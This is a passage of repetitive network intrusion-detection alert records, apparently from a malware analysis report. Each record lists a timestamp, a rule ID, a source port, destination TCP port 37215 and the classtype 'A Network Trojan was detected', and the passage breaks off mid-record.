          Timestamp:06/08/24-15:05:21.024812
          SID:2829579
          Source Port:37844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.743487
          SID:2835222
          Source Port:43192
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.161679
          SID:2835222
          Source Port:54162
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.408598
          SID:2829579
          Source Port:46648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.514287
          SID:2835222
          Source Port:43184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.511459
          SID:2835222
          Source Port:59200
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.075593
          SID:2829579
          Source Port:53316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.155921
          SID:2835222
          Source Port:58984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.784042
          SID:2835222
          Source Port:52236
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.808646
          SID:2835222
          Source Port:35292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.732405
          SID:2835222
          Source Port:51736
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.798933
          SID:2835222
          Source Port:52226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.036329
          SID:2829579
          Source Port:33510
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.517568
          SID:2835222
          Source Port:43304
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.259756
          SID:2835222
          Source Port:51838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.601477
          SID:2829579
          Source Port:33172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.161414
          SID:2835222
          Source Port:56202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.272065
          SID:2829579
          Source Port:48798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.183881
          SID:2829579
          Source Port:35600
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352177
          SID:2829579
          Source Port:37932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.740773
          SID:2829579
          Source Port:54194
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.545647
          SID:2829579
          Source Port:60680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.405323
          SID:2835222
          Source Port:40466
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.603143
          SID:2835222
          Source Port:39110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.036500
          SID:2835222
          Source Port:48392
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.114463
          SID:2829579
          Source Port:44972
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.153684
          SID:2835222
          Source Port:42296
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.446352
          SID:2829579
          Source Port:50624
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.744076
          SID:2835222
          Source Port:56540
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.178215
          SID:2835222
          Source Port:41434
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.841971
          SID:2835222
          Source Port:36562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.798497
          SID:2835222
          Source Port:48178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.179576
          SID:2829579
          Source Port:51204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.262517
          SID:2835222
          Source Port:57868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160948
          SID:2829579
          Source Port:35254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.673475
          SID:2829579
          Source Port:43236
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.703613
          SID:2835222
          Source Port:38906
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.067957
          SID:2835222
          Source Port:34172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.178259
          SID:2835222
          Source Port:45950
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.270375
          SID:2835222
          Source Port:51172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.731893
          SID:2829579
          Source Port:59806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730604
          SID:2829579
          Source Port:55912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.783838
          SID:2835222
          Source Port:45822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.891258
          SID:2835222
          Source Port:39702
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.262351
          SID:2835222
          Source Port:52572
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.745087
          SID:2829579
          Source Port:36906
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.554685
          SID:2829579
          Source Port:36980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.471173
          SID:2829579
          Source Port:45864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.595051
          SID:2835222
          Source Port:37368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.443952
          SID:2835222
          Source Port:54502
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.044938
          SID:2835222
          Source Port:44016
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.799712
          SID:2829579
          Source Port:44794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.732446
          SID:2829579
          Source Port:39520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.446944
          SID:2829579
          Source Port:35992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.809039
          SID:2835222
          Source Port:50198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.893762
          SID:2835222
          Source Port:45762
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.460681
          SID:2829579
          Source Port:60892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.463231
          SID:2835222
          Source Port:36170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.110972
          SID:2835222
          Source Port:53846
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.508997
          SID:2829579
          Source Port:34578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.110775
          SID:2829579
          Source Port:39688
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.099488
          SID:2829579
          Source Port:33132
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.133172
          SID:2829579
          Source Port:39628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.467594
          SID:2835222
          Source Port:45930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.179919
          SID:2829579
          Source Port:39268
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.107881
          SID:2835222
          Source Port:50406
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.894762
          SID:2835222
          Source Port:51562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.151339
          SID:2835222
          Source Port:46702
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.793295
          SID:2835222
          Source Port:44888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.242655
          SID:2829579
          Source Port:50816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.236848
          SID:2829579
          Source Port:56640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.512561
          SID:2829579
          Source Port:42948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.271311
          SID:2829579
          Source Port:60992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.058154
          SID:2829579
          Source Port:57786
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.275553
          SID:2835222
          Source Port:41816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.704832
          SID:2829579
          Source Port:37110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.178425
          SID:2829579
          Source Port:49424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.081704
          SID:2835222
          Source Port:45664
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.081170
          SID:2829579
          Source Port:34768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.113764
          SID:2829579
          Source Port:57324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.806281
          SID:2835222
          Source Port:37822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.554481
          SID:2829579
          Source Port:48860
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.792725
          SID:2835222
          Source Port:39490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.018234
          SID:2829579
          Source Port:46858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.888594
          SID:2829579
          Source Port:45470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.270017
          SID:2829579
          Source Port:52652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.132367
          SID:2829579
          Source Port:42078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.238143
          SID:2829579
          Source Port:44362
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.468772
          SID:2829579
          Source Port:45252
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.037088
          SID:2829579
          Source Port:54262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.262515
          SID:2829579
          Source Port:34096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.464094
          SID:2829579
          Source Port:56848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.897395
          SID:2835222
          Source Port:53678
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.448784
          SID:2835222
          Source Port:37964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.602497
          SID:2829579
          Source Port:49224
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.850288
          SID:2829579
          Source Port:57404
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.242150
          SID:2835222
          Source Port:41162
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.861019
          SID:2835222
          Source Port:39080
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.892800
          SID:2829579
          Source Port:34604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.743668
          SID:2829579
          Source Port:54624
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.551811
          SID:2829579
          Source Port:47528
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.818709
          SID:2829579
          Source Port:32986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.260025
          SID:2835222
          Source Port:50966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.551866
          SID:2829579
          Source Port:42138
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.257560
          SID:2829579
          Source Port:35418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.157808
          SID:2829579
          Source Port:49760
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159973
          SID:2835222
          Source Port:50764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.739534
          SID:2829579
          Source Port:43016
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.673173
          SID:2829579
          Source Port:45836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.508847
          SID:2829579
          Source Port:38950
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.669967
          SID:2835222
          Source Port:39150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.175978
          SID:2829579
          Source Port:49092
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.017091
          SID:2829579
          Source Port:43706
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.132026
          SID:2835222
          Source Port:49072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.603208
          SID:2835222
          Source Port:60818
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.737873
          SID:2835222
          Source Port:33518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.017588
          SID:2829579
          Source Port:57616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.822417
          SID:2835222
          Source Port:41980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.236716
          SID:2829579
          Source Port:56074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.188971
          SID:2829579
          Source Port:33464
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.469011
          SID:2829579
          Source Port:56770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.128665
          SID:2835222
          Source Port:48234
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.782214
          SID:2835222
          Source Port:36338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.783375
          SID:2835222
          Source Port:43406
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.005412
          SID:2835222
          Source Port:36142
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.401820
          SID:2829579
          Source Port:49322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.706363
          SID:2829579
          Source Port:43120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.470336
          SID:2829579
          Source Port:51004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.800020
          SID:2835222
          Source Port:35704
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.126927
          SID:2829579
          Source Port:45634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.276699
          SID:2835222
          Source Port:45400
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.601365
          SID:2829579
          Source Port:36096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.242299
          SID:2835222
          Source Port:39840
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.509072
          SID:2835222
          Source Port:42014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.456405
          SID:2829579
          Source Port:55314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.542244
          SID:2829579
          Source Port:54250
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.854781
          SID:2835222
          Source Port:55104
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.401942
          SID:2835222
          Source Port:42892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.242797
          SID:2829579
          Source Port:33264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.260654
          SID:2829579
          Source Port:41592
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.174324
          SID:2835222
          Source Port:55084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.466171
          SID:2835222
          Source Port:60332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.445978
          SID:2835222
          Source Port:40788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.846318
          SID:2835222
          Source Port:36732
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.039464
          SID:2835222
          Source Port:39958
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461416
          SID:2829579
          Source Port:33968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.606157
          SID:2829579
          Source Port:33866
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.448584
          SID:2829579
          Source Port:47418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.306415
          SID:2829579
          Source Port:43332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.789924
          SID:2835222
          Source Port:43292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.067819
          SID:2835222
          Source Port:40632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.844503
          SID:2829579
          Source Port:53276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.837573
          SID:2835222
          Source Port:46716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.155452
          SID:2835222
          Source Port:51408
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.824917
          SID:2829579
          Source Port:47632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.668504
          SID:2829579
          Source Port:37584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.165536
          SID:2835222
          Source Port:44104
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.407679
          SID:2835222
          Source Port:35150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.403713
          SID:2829579
          Source Port:43968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.707575
          SID:2829579
          Source Port:50888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.462277
          SID:2829579
          Source Port:53150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.741342
          SID:2835222
          Source Port:41374
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.744189
          SID:2829579
          Source Port:56296
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.798839
          SID:2835222
          Source Port:36610
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.672869
          SID:2829579
          Source Port:60684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.188748
          SID:2835222
          Source Port:54870
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.356258
          SID:2829579
          Source Port:39382
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.787526
          SID:2835222
          Source Port:35400
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.111765
          SID:2835222
          Source Port:46756
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.408254
          SID:2835222
          Source Port:48110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.894777
          SID:2835222
          Source Port:38460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.157134
          SID:2835222
          Source Port:44488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.599298
          SID:2829579
          Source Port:50594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.176886
          SID:2829579
          Source Port:42256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.155194
          SID:2835222
          Source Port:46708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.471501
          SID:2835222
          Source Port:56186
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.704703
          SID:2829579
          Source Port:53074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.547319
          SID:2835222
          Source Port:60486
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.548089
          SID:2829579
          Source Port:51314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.829542
          SID:2829579
          Source Port:35594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.268883
          SID:2829579
          Source Port:46208
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.466296
          SID:2829579
          Source Port:59604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.846269
          SID:2829579
          Source Port:48026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.243079
          SID:2829579
          Source Port:52216
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.801156
          SID:2829579
          Source Port:57072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160557
          SID:2835222
          Source Port:45708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.709915
          SID:2829579
          Source Port:44704
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.462978
          SID:2829579
          Source Port:39994
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730033
          SID:2829579
          Source Port:51180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.265906
          SID:2829579
          Source Port:45046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.164408
          SID:2835222
          Source Port:35104
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.894957
          SID:2835222
          Source Port:34778
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.017733
          SID:2835222
          Source Port:47360
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.895951
          SID:2829579
          Source Port:52770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.463503
          SID:2829579
          Source Port:37456
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.893264
          SID:2835222
          Source Port:40574
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.155673
          SID:2829579
          Source Port:54202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.895750
